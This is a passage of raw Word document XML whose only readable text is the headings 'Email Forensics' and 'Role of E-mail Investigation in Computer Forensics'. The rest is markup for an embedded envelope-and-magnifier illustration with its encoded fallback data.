        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="003D065D">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8"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">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r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EMAIL FORENSICS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Role of E-mail Investigation in Computer Forensics</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="239"/>
        <w:ind w:left="1807"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DA9B0A3" wp14:editId="71EA6B5A">
                <wp:extent cx="3253624" cy="2759522"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="15623" name="Group 15623"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3253624" cy="2759522"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3253624" cy="2759522"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="586" name="Shape 586"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="288661"/>
                            <a:ext cx="3253624" cy="2041888"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3253624" h="2041888">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1598471" y="1239128"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1607150" y="1245202"/>
                                  <a:pt x="1616859" y="1248890"/>
                                  <a:pt x="1626405" y="1248890"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1635951" y="1248891"/>
                                  <a:pt x="1645444" y="1246286"/>
                                  <a:pt x="1653254" y="1240212"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="3253624" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3253624" y="2024531"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="3253623" y="2034077"/>
                                  <a:pt x="3245814" y="2041888"/>
                                  <a:pt x="3236267" y="2041888"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="17357" y="2041888"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="7811" y="2041888"/>
                                  <a:pt x="0" y="2034077"/>
                                  <a:pt x="0" y="2024531"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="5E5E5E"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="587" name="Shape 587"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="112006" y="273745"/>
                            <a:ext cx="3029611" cy="1162918"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3029611" h="1162918">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3029611" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1515213" y="1162918"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="5E5E5E"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="588" name="Shape 588"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="676063" y="0"/>
                            <a:ext cx="1075278" cy="1896825"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1075278" h="1896825">
                                <a:moveTo>
                                  <a:pt x="1040928" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1075278" y="859"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1075278" y="198311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1043728" y="197983"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="896668" y="203753"/>
                                  <a:pt x="754729" y="252864"/>
                                  <a:pt x="633327" y="341245"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="298624" y="584902"/>
                                  <a:pt x="224657" y="1055285"/>
                                  <a:pt x="468306" y="1389975"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="596724" y="1566390"/>
                                  <a:pt x="788150" y="1670439"/>
                                  <a:pt x="989509" y="1693695"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1075278" y="1698634"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1075278" y="1896720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1072463" y="1896825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="777627" y="1895241"/>
                                  <a:pt x="489894" y="1756570"/>
                                  <a:pt x="308024" y="1506740"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="1083608"/>
                                  <a:pt x="93668" y="488766"/>
                                  <a:pt x="516778" y="180748"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="675434" y="65239"/>
                                  <a:pt x="858144" y="6348"/>
                                  <a:pt x="1040928" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="ED220D"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="589" name="Shape 589"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1751341" y="859"/>
                            <a:ext cx="1415887" cy="2758663"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1415887" h="2758663">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="79663" y="1993"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="344656" y="24482"/>
                                  <a:pt x="598822" y="157251"/>
                                  <a:pt x="767276" y="388643"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1023894" y="741169"/>
                                  <a:pt x="1007878" y="1221157"/>
                                  <a:pt x="728283" y="1555860"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="707386" y="1581066"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="730437" y="1604333"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="733623" y="1607519"/>
                                  <a:pt x="736748" y="1610903"/>
                                  <a:pt x="739486" y="1614674"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1387078" y="2504197"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1415887" y="2543789"/>
                                  <a:pt x="1407050" y="2599484"/>
                                  <a:pt x="1367473" y="2628287"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1215162" y="2739235"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1196127" y="2753126"/>
                                  <a:pt x="1172560" y="2758663"/>
                                  <a:pt x="1149025" y="2754961"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1125509" y="2751259"/>
                                  <a:pt x="1104936" y="2738692"/>
                                  <a:pt x="1091073" y="2719631"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="443481" y="1830107"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="442289" y="1828474"/>
                                  <a:pt x="441246" y="1826802"/>
                                  <a:pt x="439818" y="1824505"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="423230" y="1797577"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="394361" y="1810719"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="292220" y="1857409"/>
                                  <a:pt x="185082" y="1884413"/>
                                  <a:pt x="77696" y="1892979"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1895861"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1697774"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="981" y="1697831"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="154232" y="1697831"/>
                                  <a:pt x="308886" y="1651246"/>
                                  <a:pt x="441972" y="1554353"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="776649" y="1310703"/>
                                  <a:pt x="850610" y="840120"/>
                                  <a:pt x="606995" y="505409"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="489122" y="343513"/>
                                  <a:pt x="314977" y="237172"/>
                                  <a:pt x="116668" y="205957"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="91874" y="202052"/>
                                  <a:pt x="67074" y="199363"/>
                                  <a:pt x="42345" y="197891"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="197451"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="ED220D"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="172E571E" id="Group 15623" o:spid="_x0000_s1026" style="width:256.2pt;height:217.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="32536,2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&#10;">
                <v:shape id="Shape 586" o:spid="_x0000_s1027" style="position:absolute;top:2886;width:32536;height:20419;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3253624,2041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2WxgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gpepG4qKiF1lVJo8RBSkwZ6fWSfSTD7NmS3Mf77bqHgcZiZb5jdYTKdGGlwrWUFz8sI&#10;BHFldcu1gvLr/SkG4Tyyxs4yKbiRg8P+YbbDRNsr5zQWvhYBwi5BBY33fSKlqxoy6Ja2Jw7e2Q4G&#10;fZBDLfWA1wA3nVxF0VYabDksNNjTW0PVpfgxCtbZ5nPk7/OC0vhjPKWXfJWVk1Lzx+n1BYSnyd/D&#10;/+2jVrCJt/B3JhwBuf8FAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAsCMNlsYAAADcAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,l1598471,1239128v8679,6074,18388,9762,27934,9762c1635951,1248891,1645444,1246286,1653254,1240212l3253624,r,2024531c3253623,2034077,3245814,2041888,3236267,2041888r-3218910,c7811,2041888,,2034077,,2024531l,xe" fillcolor="#5e5e5e" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,3253624,2041888"/>
                </v:shape>
                <v:shape id="Shape 587" o:spid="_x0000_s1028" style="position:absolute;left:1120;top:2737;width:30296;height:11629;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3029611,116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9KCxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvuonQNKSuUgWxYC9Ve39kX7PbZt+G7GrSf+8WCj0OM/MNs9qMrhU36oP1rCBfZCCI&#10;a68tNwou5/28BBEissbWMyn4oQCb9XSywkr7gd/pdoqNSBAOFSowMXaVlKE25DAsfEecvE/fO4xJ&#10;9o3UPQ4J7lq5zLJCOrScFgx2tDNUf5+uTsFHMeyKo8m3b9Ee8r0uG/tVDko9zMaXZxCRxvgf/mu/&#10;agWP5RP8nklHQK7vAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANOL0oLEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l3029611,,1515213,1162918,,xe" fillcolor="#5e5e5e" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,3029611,1162918"/>
                </v:shape>
                <v:shape id="Shape 588" o:spid="_x0000_s1029" style="position:absolute;left:6760;width:10753;height:18968;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1075278,189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TwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LasJA&#10;FN0X/IfhCm6KTpRq0ugoEijtwo2Pli6vmWsSzNwJmWkS/76zKHR5OO/NbjC16Kh1lWUF81kEgji3&#10;uuJCweX8Nk1AOI+ssbZMCh7kYLcdPW0w1bbnI3UnX4gQwi5FBaX3TSqly0sy6Ga2IQ7czbYGfYBt&#10;IXWLfQg3tVxE0UoarDg0lNhQVlJ+P/0YBfFrE78cPr8imb1/X4tnI/UDO6Um42G/BuFp8P/iP/eH&#10;VrBMwtpwJhwBuf0FAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAyP6508MAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m1040928,r34350,859l1075278,198311r-31550,-328c896668,203753,754729,252864,633327,341245,298624,584902,224657,1055285,468306,1389975v128418,176415,319844,280464,521203,303720l1075278,1698634r,198086l1072463,1896825c777627,1895241,489894,1756570,308024,1506740,,1083608,93668,488766,516778,180748,675434,65239,858144,6348,1040928,xe" fillcolor="#ed220d" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1075278,1896825"/>
                </v:shape>
                <v:shape id="Shape 589" o:spid="_x0000_s1030" style="position:absolute;left:17513;top:8;width:14159;height:27587;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1415887,2758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1k6xQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9fa8Iw&#10;FMXfhX2HcAd7kZmu6NDOKNtQENTBqmOvl+auKWtuShO1fnsjCD4ezp8fZzrvbC2O1PrKsYKXQQKC&#10;uHC64lLBfrd8HoPwAVlj7ZgUnMnDfPbQm2Km3Ym/6ZiHUsQR9hkqMCE0mZS+MGTRD1xDHL0/11oM&#10;Ubal1C2e4ritZZokr9JixZFgsKFPQ8V/frAR8vH7Rf2crFlvF8OftEir/cYq9fTYvb+BCNSFe/jW&#10;XmkFo/EErmfiEZCzCwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDyc1k6xQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,l79663,1993c344656,24482,598822,157251,767276,388643v256618,352526,240602,832514,-38993,1167217l707386,1581066r23051,23267c733623,1607519,736748,1610903,739486,1614674r647592,889523c1415887,2543789,1407050,2599484,1367473,2628287r-152311,110948c1196127,2753126,1172560,2758663,1149025,2754961v-23516,-3702,-44089,-16269,-57952,-35330l443481,1830107v-1192,-1633,-2235,-3305,-3663,-5602l423230,1797577r-28869,13142c292220,1857409,185082,1884413,77696,1892979l,1895861,,1697774r981,57c154232,1697831,308886,1651246,441972,1554353,776649,1310703,850610,840120,606995,505409,489122,343513,314977,237172,116668,205957,91874,202052,67074,199363,42345,197891l,197451,,xe" fillcolor="#ed220d" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1415887,2758663"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:spacing w:after="5" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="5300"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
